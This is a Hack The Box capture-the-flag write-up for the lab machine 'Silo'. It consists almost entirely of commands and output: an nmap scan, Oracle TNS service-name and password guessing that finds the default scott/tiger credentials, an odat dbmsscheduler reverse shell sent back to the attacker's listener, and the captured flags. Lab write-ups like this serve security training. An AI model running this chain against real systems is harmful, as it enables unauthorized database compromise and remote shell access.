Silo

Thu, 19 September 2024
Platform: Hack The Box

sudo nmap 10.10.10.82 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC

Nmap scan report for 10.10.10.82
Host is up (0.036s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-09-18T23:13:59
|_  start_date: 2024-09-18T21:47:51

sudo odat snguesser -s 10.10.10.82               

[1] (10.10.10.82:1521): Searching valid Service Names
[1.1] Searching valid Service Names thanks to a well known Service Name list on the 10.10.10.82:1521 server
[+] 'XE' is a valid Service Name. Continue...            
[+] 'XEXDB' is a valid Service Name. Continue...         
[1.2] Searching valid Service Names thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
[1.3] Searching valid Service Names thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid Service Name. Continue...            

[+] Service Name(s) found on the 10.10.10.82:1521 server: XE,XEXDB

sudo odat passwordguesser -s 10.10.10.82 -n XEXDB

[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
The login cis has already been tested at least once. What do you want to do:
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password
[!] Notice: 'dip' account is locked, so skipping this username for password
[!] Notice: 'hr' account is locked, so skipping this username for password
[!] Notice: 'mdsys' account is locked, so skipping this username for password
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password
[!] Notice: 'outln' account is locked, so skipping this username for password
[+] Valid credentials found: scott/tiger. Continue...
[!] Notice: 'xdb' account is locked, so skipping this username for

[+] Accounts found on 10.10.10.82:1521/ServiceName:XEXDB: 
scott/tiger

odat -h
dbmsscheduler     to execute system commands without a standard output

odat dbmsscheduler -h
connection options:
  -s SERVER                                 server
  -p PORT                                   port (Default 1521)
  -U USER                                   Oracle username
  -P PASSWORD                               Oracle password
  -d SID                                    Oracle System ID (SID)
  -n SERVICENAME                            Oracle Service Name
  --client-driver CLIENT-DRIVER             Set client driver name (default: SQL*PLUS)
  --sysdba                                  connection as SYSDBA
  --sysoper                                 connection as SYSOPER

DBMSScheduler commands:
  --exec EXEC                               execute a system command on the remote system
  --reverse-shell ip port                   get a reverse shell. Use Python on Linux targets. On Windows, uses Powershell (download a script file and executes it remotely)
  --cmd-exe                                 execute command in a "cmd.exe /c" (for --exec with Windows target only)
  --make-download urlToFile remotefilePath  make the windows target download a local file with powershell over http
  --test-module                             test the module before use it

sudo odat dbmsscheduler -s 10.10.10.82 -n XEXDB -U scott -P tiger --sysdba --reverse-shell 10.10.16.4 4435

rlwrap nc -lvnp 4435
10.10.16.4
Listening on 0.0.0.0 4435
Connection received on 10.10.10.82 49177
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>dir
  Volume in drive C has no label.
 Volume Serial Number is 69B2-6341

 Directory of C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE

09/19/2024  02:35 AM    <DIR>          .
09/19/2024  02:35 AM    <DIR>          ..
01/01/2018  01:11 AM             2,048 hc_xe.dat
01/01/2018  01:12 AM                73 initXE.ora
05/29/2014  01:05 PM            31,744 oradba.exe
09/18/2024  10:48 PM             4,495 oradim.log
01/07/2018  02:25 PM             1,536 PWDXE.ora
               5 File(s)         39,896 bytes
               2 Dir(s)   7,398,612,992 bytes free

C:\Users>dir
  Volume in drive C has no label.
 Volume Serial Number is 69B2-6341

 Directory of C:\Users

01/04/2018  10:40 PM    <DIR>          .
01/04/2018  10:40 PM    <DIR>          ..
01/03/2018  02:03 AM    <DIR>          .NET v2.0
01/03/2018  02:03 AM    <DIR>          .NET v2.0 Classic
01/03/2018  10:23 PM    <DIR>          .NET v4.5
01/03/2018  10:23 PM    <DIR>          .NET v4.5 Classic
01/01/2018  01:49 AM    <DIR>          Administrator
01/03/2018  02:03 AM    <DIR>          Classic .NET AppPool
01/07/2018  03:04 PM    <DIR>          Phineas
08/22/2013  04:39 PM    <DIR>          Public
               0 File(s)              0 bytes
              10 Dir(s)   7,398,612,992 bytes free

C:\Users\Administrator\Desktop>dir
  Volume in drive C has no label.
 Volume Serial Number is 69B2-6341

 Directory of C:\Users\Administrator\Desktop

01/07/2018  02:34 PM    <DIR>          .
01/07/2018  02:34 PM    <DIR>          ..
09/18/2024  10:48 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,398,612,992 bytes free

C:\Users\Administrator\Desktop>type root.txt
 0666bd9eb30e8f4fd1de4cbbefa027cc


C:\Users\Phineas\Desktop>dir
  Volume in drive C has no label.
 Volume Serial Number is 69B2-6341

 Directory of C:\Users\Phineas\Desktop

01/07/2018  03:03 PM    <DIR>          .
01/07/2018  03:03 PM    <DIR>          ..
01/05/2018  11:56 PM               300 Oracle issue.txt
09/18/2024  10:48 PM                34 user.txt
               2 File(s)            334 bytes
               2 Dir(s)   7,398,612,992 bytes free

C:\Users\Phineas\Desktop>type user.txt
 69472884b75beedfb12216d48516cc8b

DaddyBigFishOnline

DaddyBigFish
Online